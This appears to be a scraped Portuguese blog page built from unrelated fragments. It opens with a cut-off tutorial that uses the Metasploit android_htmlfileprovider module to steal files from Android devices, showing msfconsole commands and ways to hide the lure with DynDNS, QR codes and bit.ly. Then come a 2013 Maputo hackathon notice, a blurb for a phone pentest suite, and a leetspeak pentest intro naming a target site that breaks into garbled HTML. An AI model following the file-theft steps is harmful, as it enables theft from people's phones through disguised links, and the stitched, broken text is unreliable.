Nesse arrigo estaremos abordando uma técnica de "hackear" os dispositivos moveis
com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit com um auxiliar de sua biblioteca que pode ser encontrada no Sistema operacional BackTrack. Isso pode ser possível quando um dispositivo esta conectado em sua rede local, Mas usaremos o DynDNS que nos da um alcance melhor do ataque, e veremos como ofuscar o endereço através de codigos QR e site que encurtam links como o bit.ly .
Vamos começar!
Roubar arquivos android_htmlfileprovider
A primeira coisa é começar o msfconsole no terminal do backtrack
- root@bt:~# /opt/framework3/msf3/msfconsole
Agora vamos usar um dos módulos auxiliares do Metasploit, que serve exatamente para o nosso objetivo:
- msf > use gather/android_htmlfileprovider
- msf auxiliary(android_htmlfileprovider) >
Agora, vamos ver as opções que oferece o módulo...
- msf auxiliary(android_htmlfileprovider) > show options
- FILES (arquivos do Android que queremos roubar)
- SRVHOST (IP local que estará a espera de conexões)
- SRVPORT (A porta que estará a espera de conexões)
- SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
- SSLVersion (Se tiver ativado a opção acima, indique a versão do SSL )
- URIPATH (A URI que será utilizada)
No momento , não vamos tocar na opção FILES. Já na opção SRVPORT mudará para 80, uma vez que é a porta http normal, e será mais suspeito se conectar-se a uma outra porta. Além disso URIPATH também vai mudar, que po

1º Concurso Hackathon para programadores, estudantes e demais interessados no desenvolvimento de soluções/aplicativos inovadores ou criar um software que atenda a um fim específico ou projetos livres que sejam inovadores e utilizáveis para telemóveis.
QUANDO: Dia 1 de Marco de 2013 das 9:00H – 21:00H e Dia 2 de Março de 2013 das 9:00H as 16:30H
Onde: Centro de Formação das TDM, sala 111, Maputo - Moçambique.
Porquê: Desenvolver ideias, identificar parceiros, desenvolver aplicações inovadoras de e para Moçambique, ganhar prémios.
Áreas de Enfoque: propostas inovadoras para solucionar problemas críticos enfrentados no nosso país nos sectores de saúde, agricultura, educação, comércio e turismo com recurso a aplicativos de telemóveis.
Queira por favor se cadastrar com antecedência para reservar o seu lugar. O registo pode ser a título individual, mas é aconselhável que seja uma equipa de 2 ou mais. Para a inscrição, por favor, envie os seus dados de contato (nome completo, área de enfoque (saúde, educação, agricultura, comércio, turismo) que deseja registrar-se até o dia 26 de Fevereiro de 2013, para os seguintes endereços de e-mail:
jamo@saisprogramme.com
ou
mulweli@ologa.com
No minimo, compareca !

Pode tirar proveito de uma aplicação web vulnerável. Ao utilizar este usuário pode executar software d
Totalmente caracterizado rede sem fio, e suite web app pentesting para Smartphones
Apelidado como o "Smartphone Versão de Backtrack", Revenssis Suíte Penetração é um conjunto de todos os tipos úteis de ferramentas utilizadas em Informática e Web Application Security. Ferramentas disponíveis nele incluem: scanners Web App, codificar / decodificar e ferramentas de hash, Vulnerability Research Lab, laboratório forense, mais o must-have utilitários (Shell, SSH, DNS / WHOIS Lookup, Traceroute, Port Scanner, Spam Pesquisa DB, Netstat ... etc). Todos estes encaixe numa aplicação aprox. 10MB (pós-instalação).
Características:
Apelidado como o "Smartphone Versão de Backtrack", Revenssis Suíte Penetração é um conjunto de todos os tipos úteis de ferramentas utilizadas em Informática e Web Application Security. Ferramentas disponíveis nele incluem: scanners Web App, codificar / decodificar e ferramentas de hash, Vulnerability Research Lab, laboratório forense, mais o must-have utilitários (Shell, SSH, DNS / WHOIS Lookup, Traceroute, Port Scanner, Spam Pesquisa DB, Netstat ... etc). Todos estes encaixe numa aplicação aprox. 10MB (pós-instalação).Características:
__ /^\
.' \ / :.\
/ \ | :: \
/ /. \ / ::: |
| |::. \ / :::'/
| / \::. | / :::'/ M4star n4sss, h3lp m3 w1th th3 w0m4n's 0f th1s w0rld.
`--` \' `~~~ ':'/` /
/ ( /
/ 0 _ 0 \ /
\/ \_/ \/ /
-== '.' | '.' ==-
/\ '-^-' /\
\ _ _ /
.-`-((\o/))-`-.
_ / //^\\ \ _
."o".( , .:::. , )."o".
|o o\\ \:::::/ //o o|
\ \\ |:::::| // /
\ \\__/:::::\__// /
\ .:.\ `':::'` /.:. /
\':: |_ _| ::'/ Basic Pentest Steps/Passos basicos do pentest (teste de penetração.. Não leve por tras o sentido da coisa.) :)
jgs `---` `"""""` `---`
#BOF_ B3g1n of f1le
//Begin\\
Antes de mais nada quero dizer que estou escrevendo este trem para mostrar alguns passos basicos para enumeração/indentificação de vuls.
E espero que ninguem use isto de maneira indevida, ou seja use apenas para fins estudantis :*
==========//============//=============//===============//==============//=============//==========//=====
Como dito anteriormente não sou nenhum b0t, but fico muito satisfeito com minhas explorations, então vamos ao que interessa:
n4sss@m4gicl4b:~$ STARTTHEPAULERA!
The big Enemy:
http://siteofb4d.com.br
Em primeira estancia devemos analisar o site:
- Linguagem do s ( php, asp, aspx , html ) ( Multi: php+html, html+php <- .="" 3m="" :p:p:p="=======//=============//===========" a="" abrir="" acesso="" acham="" achei="" ag0r4="" algo="" algum="" alvo="" ap="" artigo.php="" aspx="" atras="" avan="" bem="" data-blogge="" p="">













